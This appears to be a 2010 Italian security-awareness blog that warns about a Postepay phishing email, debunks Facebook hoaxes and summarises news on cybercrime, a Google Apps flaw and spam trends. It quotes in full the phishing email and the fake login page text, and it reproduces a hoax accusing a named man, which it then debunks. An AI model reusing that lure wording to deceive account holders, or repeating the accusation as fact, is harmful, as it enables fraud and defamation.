Dopo l'ultimo caso segnalato dal nostro blog, grazie alla solerte collaborazione degli utenti, ci è pervenuta la segnalazione d'una nuova ondata di mail phishing, molto simile alla precedente. Come abbiamo già detto in altre occasioni, il phishing è una frode finalizzata all'acquisizione, per scopi illegali, di dati riservati. L'eventuale furto di identità viene realizzato attraverso l'invio di e-mail contraffatte, con la grafica ed i loghi ufficiali di aziende ed istituzioni, che invitano il destinatario a fornire informazioni personali, motivando tale richiesta con ragioni di natura tecnica. E' il caso della mail contraffatta proveniente da un sedicente mittente cliente@posta.it che ha come oggetto la sospensione del conto ai titolari carta Postepay. Ecco cosa leggiamo nella mail pervenutaci:

Oggetto:  Il suo conto è stato temporaneamente sospeso.


Per poter usufruire dei servizi online di Postepay.it occorre prima identificarsi.


Per attivare il suo conto, clicca qui: Accedi ai servizi online


CONFIDENZIALE!


Questa email contiene informazioni riservate ed è destinata solo agli utenti autorizzati. Se non sei utente autorizzato si prega di cancellare questo messaggio dal tuo email. Si prega di non rispondere a questo messaggio, e non pubblicarlo. Grazie per la vostra cooperazione.


Distinti Saluti
©Posteitaliane 2010

Se si clicca su link contenuto nella mail spam, si viene rimandati ad un sito che ripropone perfettamente il sito ufficiale Postepay di Poste Italiane. La pagina, come nelle migliori truffe, presenta dei collegamenti ipertestuali che rimandano al vero sito di Poste italiane, in maniera da rendere credibile  il sito di phishing. Google Chrome ci avverte stavolta che il sito che stiamo per visitare è stato segnalato dagli utenti come sito di phishing:


Noi procediamo comunque ed ecco come si presenta la pagina di phishing:


Ed ecco cosa leggiamo sulla pagina di phishing:

Accedi ai Servizi Online
Per poter usufruire dei servizi online di Postepay.it occorre prima identificarsi.
Inserisci negli appositi spazi il tuo nome utente e la password. Il reparto sicurezza della nostra banca le notifica che sono state prese misure per accrescere il livello di sicurezza dell'online banking, in relazione ai frequenti tentativi di accedere illegalmente ai conti bancari. Per utilizzare i servizi online e in caso di mancato accesso o non funzionamento dei servizi devi:
  • verificare il corretto inserimento del nome utente e della password.
  • inserire il nome utente come nome.cognome più l'eventuale estensione (mario.rossi-1234) richiesta durante la registrazione;
  • inserire la password rispettando la sequenza di caratteri maiuscolo o minuscolo come inseriti in fase di registrazione o in occasione dell'ultimo cambio;
  • verificare che il browser consenta connessioni con protocollo SSL e accetti i cookie della sessione;
Se non riesci a risolvere il problema chiama il numero gratuito 803.160* (dal lunedì al sabato dalle ore 8.00 alle ore 20.00) e digita "3" per i Servizi Internet

Ricordiamo che Poste Italiane non chiede mai, attraverso messaggi di posta elettronica, lettere o telefonate, di fornire i codici personali, i dati delle carte di credito o della carta Postepay. Pertanto, non è opportuno rispondere a e-mail, lettere o telefonate che abbiano come oggetto la richiesta di dati personali. In presenza di richieste di questo tipo è opportuno cambiare informare immediatamente Poste Italiane chiamando il numero gratuito 803.160. Per coloro che hanno fornito dati personali e coordinate postali, consigliamo di cambiare la password per l'accesso ai servizi online e procedere immediatamente al blocco della carta insieme ad una denuncia presso le forze dell'ordine.

Virus dell'albero di Natale, ma è un falso post condiviso su Facebook


Migliaia di utenti di Facebook sono stati avvisati circa la vicenda su un presunto virus chiamato Christmas Tree o Albero di Natale, che si sta diffondendo sotto forma di una falsa applicazione sul social network. L’avviso reca la firma di una sedicente squadra di sicurezza denominata “Geek Squad”. Sophos avverte che si tratta semplicemente d'una burla che torna a circolare sul web all’approssimarsi delle feste natalizie.

Da qualche giorno gira su Facebook un avviso di sicurezza - come spesso accade in questi casi - apparentemente utile, ma che in realtà si tratta d'una bufala. Gli utenti pensano di fare la cosa giusta quando mandano avvertimenti come questi, ma purtroppo non verificano realmente i fatti. Sarebbe più opportuno controllare presso una affermata azienda anti-virus. Anche se qualcuno potrebbe in qualsiasi momento creare una falsa applicazione con il nome di "Christmas Tree", ovviamente, non siamo a conoscenza di malware che utilizzano questo travestimento. Ecco un tipico messaggio ampiamente condiviso su Facebook:

ATTENZIONE !!!!!!..... NON UTILIZZATE L'applicazione Albero di Natale su Facebook. Perfavore avvisate che manderà in crash il computer. Geek Squad dice che si tratta del peggiore virus-trojan che si sia mai diffuso. Copi-incollate e fatelo sapere ai vostri amici. GRAZIE PER FAVORE RICOPIATE!
Inoltre, chi è Geek Squad da essere una fonte affidabile di informazioni su nuovi malware? Un avviso sarebbe legittimo per lo meno includendo alcuni link per ulteriori informazioni. Ironia della sorte, la bufala si sta diffondendo molto più velocemente di qualsiasi autentico comune virus incontrato su Facebook. Si prega di non diffondere avvisi di virus da condividere con i vostri amici online fino a quando non sono controllati da una fonte attendibile (ad esempio una società di sicurezza informatica). 


[Update] La bufala adesso è anche in versione italiana e condivisa da numerose pagine su Facebook, che spesso usano questi avvisi per aumentare condivisioni ed aumentare iscritti. L'avviso recita testualmente: "A TUTTI ATTENZIONE!!!!!!! ..... Non utilizzare L'applicazione " l'albero di Natale" che vi inviano su Facebook anche i vostri amici, a volte non ne sono consapevoli! il computer Potrebbe andare in crash per chè si tratta di uno dei più potenti virus Trojan-Horse. Purtroppo si sta diffondendo velocemente ...METTETE IN GUARDIA i vostri amici e contatti!!!!!!!!...........copiate.........e diffondete!!!!!!!"


L'app esiste ma non presenta alcun virus e viene riproposta in prossimità del Natale (non avrebbe senso ovviamente in altri periodi dell'anno). Il malware può essere ucciso abbastanza facilmente, ma la disinformazione come questa può vivere per mesi, se non anni, perché le persone credono di "fare la cosa giusta", condividendo l'avviso con i loro amici. Ricordiamo, per i più anziani, che alla fine del 1980 ci fu un vero virus chiamato "Christmas Tree" (conosciuto anche come "CHRISTMA EXEC"). Scritto in linguaggio compilato REXX, questo visualizzava l'immagine nuda di un albero di Natale utilizzando il set di caratteri ASCII, e infettò la rete interna di IBM ed altri sistemi.

Protocollo d'intesa fra Polizia Postale e società di sicurezza Symantec


Un protocollo d'intesa per la prevenzione dei crimini informatici, è stato sottoscritto ieri tra la Polizia di Stato e Symantec EMEA Mediterranean Region azienda leader nella creazione di soluzioni per la sicurezza informatica. La convenzione della durata di tre anni ha come obiettivo quello di contrastare gli attacchi verso i sistemi informativi e alle infrastrutture critiche informatizzate nazionali.

Si diffonde sempre di piu' l'uso di internet e, parallelamente, crescono i crimini informatici. Nei primi sei mesi del 2010 la polizia postale ha denunciato 819 persone per reati in materia di e-commerce e ne ha arrestate 37. Sono state 2.913 le persone denunciate per hacking, con 76 arrestati, mentre 475 denunce e 51 arresti hanno riguardato i reati pedopornografici. Da gennaio a settembre, infine, il commissariato on line della Polizia postale, www.commissariatodips.it, ha ricevuto 757 segnalazioni, 189 denunce e 565 richieste di informazioni per fati relativi alla rete. 

I dati sono stati forniti a margine della sigla di un protocollo di intesa per la prevenzione dei crimini informatici tra la Polizia postale e la societa' Symantec. L'intesa realizzata con Symantec, azienda leader in sicurezza e gestione dei sistemi di protezione delle informazioni, ha durata triennale e punta a contrastare gli attacchi rivolti ai sistemi informativi e alle infrastrutture critiche informatizzate nazionali. 

Grazie all'accordo, spiega il prefetto Oscar Fioriolli, verranno promosse iniziative congiunte di approfondimento, formazione e interscambio di esperienze sulla sicurezza informatica e condivise iniziative di sensibilizzazione all'utilizzo corretto delle risorse informatiche e alla sicurezza on line. Symantec e Polizia Postale hanno anche realizzato alcuni video informativi volti ad illustrare i principali rischi che gli utenti corrono online.

Secondo i dati del «Norton cybercrime human impact report» diffuso da Symantec, il 69% di italiani ha subito una qualche forma di cybercrimine, l'89% ne sono preoccupati, il 51% ha scoperto il proprio pc infetto da virus, il 10% è stato vittima di truffe on line e il 4% ha subito il furto d'identità. Nonostante l'incidenza di questa minaccia, sottolinea Symantec, solo la metà della popolazione adulta (il 51%) si dichiara disponibile a modificare il proprio comportamento on line qualora rimanesse vittima di un crimine.

Secondo Symantec, nel 2009 le attività degli hacker volte a sottrarre l'identità sono notevolmente aumentate rispetto al 2008, passando dal 22% al 60% del totale delle minacce. Il cybercrimine è un fenomeno che riguarda anche le aziende. Symantec ha infatti stimato che il costo medio sostenuto da un'organizzazione compromessa è all'incirca di 5 milioni di dollari, mentre 23 milioni di euro è il costo massimo a oggi sostenuto in seguito a un attacco informatico.

Questi dati vengono venduti spesso in un vero e proprio mercato nero delle informazioni, che ha un volume di affari che si aggira intorno ai 210 milioni di euro. «Sono soprattutto le informazioni personali a essere prese di mira dai cyber criminali», ha commentato Marco Riboli, Vice President e General Manager, Symantec Emea Mediterranean Region. «Il protocollo che abbiamo sottoscritto oggi - dichiara il direttore centrale delle specialità della Polizia di Stato, Oscar Fioriolli, è una risposta efficace mirata al contrasto dei crimini informatici.

L'accordo - conclue Fioriolli - rientra nel modello di sicurezza partecipata, nel quale la sinergia pubblico/privato può essere un'arma vincente da utilizzare per combattere questo crimine emergente». Antonio Apruzzese, direttore del Servizio polizia postale e delle comunicazioni, dichiara che «la nostra  è una lotta impegnativa contro tutte le forme di crimine informatico che, ultimamente, stanno manifestando una rilevante potenzialità offensiva. 

Anche per questo - conclude Apruzzese - la polizia postale e delle comunicazioni vuole estendere la sua sempre più ampia 'controrete di sicurezza' attraverso la collaborazione con le aziende leader del settore». «Oggi gli utenti trascorrono sempre più tempo connessi alla rete, sia a casa sia in azienda, ed evidentemente sono più esposti al rischio di cadere vittime delle minacce informatiche", ha commentato il vice presidente e General Manager, Symantec EMEA Mediterranean Region, Marco Riboli. 

"Sono soprattutto le informazioni personali ad essere prese di mira dai cyber criminali, che sviluppano modalità di attacco sempre più sofisticate e complesse. Per informare gli utenti sui rischi che corrono quando navigano online ed educarli a prevenirli, è pertanto necessario diffondere una cultura della sicurezza informatica e adottare approcci e iniziative di sensibilizzazione all'uso corretto di Internet. Con la firma del protocollo d'intesa, Symantec intende impegnarsi con la polizia postale a garantire la protezione dagli attacchi informatici e la sicurezza degli utenti». 


Grave vulnerabilità in Google apps: hacker invia email a nome di Google

Un hacker armeno ha dimostrato un serio problema di sicurezza in Google Apps durante il fine settimana, che gli ha permesso di raccogliere indirizzi e-mail da parte degli utenti Gmail e inviare loro messaggi molto credibili a nome di Google. L'attacco è stato avviato attraverso una pagina di Blogspot appositamente predisposta. Qualsiasi utente loggato in Gmail che ha visitato questa pagina, subito ha ricevuto una mail che sembrava provenire dalla società.

Secondo Graham Cluley, senior technology consultant di Sophos, fornitore del software antivirus, la cosa interessante di questo attacco è che le email canaglia non avevano presentato le consuete intestazioni contraffatte. Sono venute da un indirizzo noreply@google.com, attraverso maestro.bounces.google.com e sono state firmate da google.com, che li rende molto adatte per il phishing. Uno scenario di attacco comporterebbe la diffusione di un link alla pagina di Blogspot attraverso Facebook promettendo un video intrigante o utilizzando qualche altro richiamo. I visitatori che si registrano in Gmail potrebbero poi ricevere una e-mail predisposta, ad esempio un allarme di sicurezza da parte di Google, che li rimanderebbero a una pagina di phishing imitando il template della pagina. I dettagli della vulnerabilità non sono stati comunicati al pubblico e in una mail a TechCrunch l'hacker si è presentato come un ragazzo armeno di 21 anni di nome Vahe G. L'hacker ha proposto il proprio bug sul sito guntada.blogspot.com, dunque utilizzando un server gestito direttamente da Google. Una mail di segnalazione è stata inoltre inviata al team di sicurezza di Google senza però che fosse giunta alcuna risposta.


E' stata la mail inviata a TechCrunch che ha permesso di portare la storia di pubblico dominio e a questo punto Google è intervenuto chiudendo il sito contenente l’exploit. Poi un messaggio a TechCrunch per confermare l’accaduto: «Teniamo in seria considerazione i possibili problemi di sicurezza ed il nostro team sta attivamente investigando quest’ultimo. Daremo presto informazioni in proposito». Ciò è strano considerando che l'azienda oggi offre ricompense per le vulnerabilità gravi trovate nei suoi servizi web. Da questo bug l'hacker avrebbe potuto ottenere 500 $ o più, se l'avesse segnalato per le vie appropriate. Quello che è chiaro è invece il fatto che il bug sia di grave entità e che sia necessario da parte di Google un sollecito chiarimento in merito. A seguito della mail inviata dall'hacker al team di TechCrunch, una volta visitato il sito, si è visto recapitata in automatico una email nella quale si comunica (non senza ironia) che la visita è stata notata. Ma come ha fatto il sito ad avere l’indirizzo email del visitatore, agendo peraltro senza problemi anche sui navigatori in modalità “Incognito”? Il grave problema risiedeva nel sistema Google Friend Connect. L’effetto del bug ha messo in evidenza in pratica la capacità di captare l’indirizzo email del visitatore e di farne l’uso preferito.

Email inviata a TechCrunch dopo la visita al sito contenente l'exploit

Potrebbe essere un modo per raccogliere indirizzi email a fini di spam o un sistema utile per agire con finalità di phishing ai danni degli utenti. Inoltre potrebbe essere un modo pericoloso per identificare gli utenti che navigano su siti, per esempio, “a luci rosse”. Sul blog l'hacker rincarava la dose puntando il dito contro un aspetto particolare ed ulteriore della questione: «Gli utenti utilizzanti Government Google Apps lo sanno?». Le prime analisi identificavano il problema nel contesto di Google Friend Connect, quindi con la capacità di sottrarre l’indirizzo email dell’utente captando semplicemente le informazioni dai precedenti login su siti Google. Il gigante della ricerca ha confermato l'esistenza del difetto nel suo Google Apps Script API e ha detto che è stato rapidamente risolto:
«Abbiamo rapidamente risolto il problema della API di Google Apps Script che avrebbe consentito di inviare delle email agli utenti Gmail senza il loro permesso, se avessero visitato un sito web appositamente progettato mentre erano nel loro account. Abbiamo immediatamente rimosso il sito che ha dimostrato il problema, e disattivato la funzionalità subito dopo. Incoraggiamo la divulgazione responsabile di potenziali problemi alle applicazione potenziali problemi scrivendo a security@google.com»
Il problema era grave, insomma, ma la risoluzione è stata immediata. Tuttavia, i problemi di sicurezza per questo tipologie di problemi sono una minaccia reale, dato che sempre più persone si basano su comunicazioni di posta elettronica, e i loro fornitori di servizi webmail non forniscono una soluzione affidabile, di filtro della casella di posta. Questo è stata una grave falla sulla sicurezza.

martedì 23 novembre 2010

Aumentano le email con allegati pericolosi nel terzo trimestre del 2010


Secondo l’ultimo rapporto diffuso da Kaspersky Lab, azienda da sempre impegnata nel settore della sicurezza e delle soluzioni di gestione delle minacce informatiche, la quota di spam con allegati pericolosi nel traffico di posta elettronica è più che raddoppiato nel terzo trimestre del 2010, con una media annua del 4,6% rispetto all’1,9% del secondo trimestre. All’inizio del terzo trimestre 2010, invece - un fatto senza precedenti - questa percentuale ha superato il 6,3% del traffico email generale. 

Gli analisti di Kaspersky Lab suggeriscono che questo fenomeno sia dovuto agli spammer, che avrebbero semplicemente concentrato di più la loro attenzione dai singoli utenti individuali ai programmi partner, inclusi quelli connessi alla diffusione di malware. Il genere di “mailing di massa” con il maggiore aumento è quello delle finte notifiche provenienti da fonti apparentemente ufficiali, come Twitter, Facebook, WindowsLive, MySpace e diversi notissimi negozi online. I link contenuti in queste notifiche fasulle dirottano gli utenti ad uno spammer service che scarica il backdoor Bredolab nei computer degli utenti, ed è poi usato a sua volta per scaricare vari altri Trojan.


“L’aumento del volume e della qualità di queste mailing di massa conferma l’ipotesi che gli spammer e i cybercriminali hanno iniziato ad agire all’unisono e di comune accordo per creare delle strategie d’infezione nuove e più complesse, come connettere il computer di una vittima a un Botnet inviandogli spam, per rubare i suoi dati personali e via dicendo” afferma Darya Gudkova, Head of Content Analysis & Research alla Kaspersky Lab. Complessivamente, il livello di spam nel terzo trimestre è calato rispetto al trimestre precedente, con una media dell’82,3%. 

Gli utenti hanno quindi trovato nelle proprie caselle di posta elettronica, a settembre, una quantità di spam considerevolmente inferiore rispetto al mese di agosto, con una flessione di 1,5 punti percentuali. La causa della flessione è dovuta principalmente alla chiusura di oltre 20 centri di controllo usati dal Botnet Pushdo / Cutwail, che era responsabile di circa il 10% di tutto lo spam mondiale. Questa minaccia non era solo legata all’enorme volume di spam distribuito, ma anche al suo collegamento con la diffusione di programmi particolarmente dannosi come Zbot (ZeuS) e TDSS.



Quando i centri di comando del Bootnet sono stati chiusi, un enorme numero di bot ha smesso di distribuire spam, non essendo più sotto il controllo degli spammer. Un’altra chiusura nel terzo trimestre è stata avviata dagli stessi spammer, quando il programma partner SpamIt, responsabile di enormi quantitativi di spam del settore farmeaceutico, ha annunciato la fine delle sue attività. I siti di questo programma, SpamIt.biz e Spamit.com, hanno anche “postato” le motivazioni della loro chiusura concentrandole in “una lunga lista di eventi negativi nel corso dello scorso anno e la più intensa e maggiore attenzione prestata alle operazioni del nostro programma partner”. 

“La chiusura di un programma partner - anche di uno dei maggiori - avrà solo il risultato di fare arrivare meno pubblicità di viagra nella nostra posta ricevuta; ma è un effetto temporaneo, gli spammer non stanno certo abbandonando un business così redditizio” dice ancora la Gudkova. “Facile presumere che i gestori del programma ne apriranno semplicemente uno nuovo che, per un po’, resterà al di sotto dei radar dei venditori di anti-spam e delle forze dell’ordine.”


Così come nel secondo trimestre dell'anno, la Top-10 relativa alle organizzazioni maggiormente bersagliate dagli attacchi dei phisher risulta capeggiata da PayPal, il noto sistema di pagamento online, con un considerevole margine percentuale rispetto alle altre società / organizzazioni / istituti bancari presenti in classifica. La seconda posizione della speciale graduatoria da noi stilata risulta come al solito occupata da eBay, il celebre portale dedicato alle aste online. Seguono, rispettivamente al terzo e quarto posto, il popolarissimo social network Facebook e HSBC, istituto bancario di primaria importanza, i quali hanno invertito le loro posizioni rispetto al trimestre precedente. 

Il trend principale nel terzo quarto dell'anno è stato l’allineamento tra l’industria dello spam e i produttori di virus. Lo spam oggi non è più un semplice fastidio, ma è una componente importante usata all’interno di schemi strategici illegali per rubare dati confidenziali, che possono essere usati per fare soldi. In ogni caso, questa situazione sta attirando l’attenzione dei legislatori e delle forze dell’ordine. Per la versione completa del rapporto Kaspersky Lab sullo spam nel terzo trimestre dell’anno, si prega di visitare: reading_room

Bufala: "Thierry Mairot entra in contatto con i ragazzi per discutere di sesso"


Ogni giorno vengono "spacciate" nuove notizie su Facebook che sono semplicemente delle bufale, che periodicamente vengono riproposte e "girano" su questo enorme social network. Alcuni utenti girano queste notizie in buona fede, altri in malafede. Per esempio vi sono pagine che sfruttano questi sistemi per far "girare" e conoscere la propria pagina, in maniera tale da incrementare il numero di fan e aumentare, possibilmente, la sua credibiltà sul social network. Una delle ultime in ordine di tempo, che gira sulle bacheche di pagine e profili nonchè come aggiornamento di status, recita in questo modo: "A tutti i genitori i cui figli hanno un profilo su Facebook...c'è un Bastardo che tenta di entrare in contatto con i ragazzi per discutere di sesso. Il suo nome è THIERRY MAIROT...CONDIVIDETE OPPURE Copiate e incollate questo messaggio sulla vostra bakeka e fate girare...eliminiamo questa spazzatura dal web". Questo messaggio è nato in Francia:

"All parents whose children have a profile on Facebook ... there's a bastard trying to get in contact with the children to discuss sex. His name is ... THIERRY MAIROT share, or copy and paste this message on your wall and roll ... we eliminate this junk from the web"

ed è stato tradotto anche in inglese:

"Tous les parents dont les enfants ont un profil sur Facebook ... il ya un bâtard essaie d'entrer en contact avec les enfants pour parler de sexe. Son nom est ... THIERRY MAIROT part, ou copiez et collez ce message sur votre mur and roll ... on élimine cette ordure sur le web"


A parte il fatto che i reati non si denunciano su Facebook tramite la condivisione di messaggi più o meno fondati, ma solo procedendo alla denuncia nelle sedi opportune. Inoltre, trasmettere o condividere messaggi senza alcun fondamento può comportare un altro tipo di reato, che nel diritto penale italiano si chiama "diffamazione". Ricordiamo che commette il reato di ingiuria (art. 594 c.p.) chi offende l'onore o il decoro di una persona presente, ed è punito con la reclusione fino a sei mesi o con la multa fino a € 516,46. Commette invece il reato di diffamazione (art. 595 c.p.) chi offende l'altrui reputazione in assenza della persona offesa. In questo caso la pena è della reclusione fino ad un anno e della multa fino a € 1032,91. Se l’offesa consiste nell’attribuzione di un fatto determinato, la pena è della reclusione fino a due anni, ovvero della multa fino a euro 2.065. Dall'ingiuria e dalla diffamazione deve distinguersi il reato di calunnia (art. 368 c.p.) che si ha quando taluno, con denunzia, querela, richiesta o istanza, anche se anonima o sotto falso nome, diretta all'Autorità giudiziaria o ad altra Autorità che abbia l'obbligo di riferire all'Autorità giudiziaria, incolpa di un reato una persona che egli sa essere innocente, oppure simula a carico di una persona le tracce di un reato. Per il reato di calunnia la pena è della reclusione da due a sei anni, salvo i casi di aggravante. Qualunque messaggio del genere, eventualmente, deve essere suffragato da fonti attendibili e documentabili, altrimenti non andrebbe condiviso. Le uniche conseguenze sono un inutile allarmismo e la diffamazione di tutti coloro che hanno lo stesso nome e cognome. Bufale del genere nascono da scherzi idioti fatti a colleghi d’ufficio, amici o semplici conoscenti o ex mariti/mogli, sottovalutando il fatto che si utilizza un sistema che può effettivamente rovinare la vita di qualcuno. In questo modo chiunque può dunque essere oggetto di diffamazione. Naturalmente, tutti gli utenti di Facebook, in particolare i bambini, dovrebbero stare sempre attenti ad aggiungere amici che non si conoscono.

Recent Posts

Post più popolari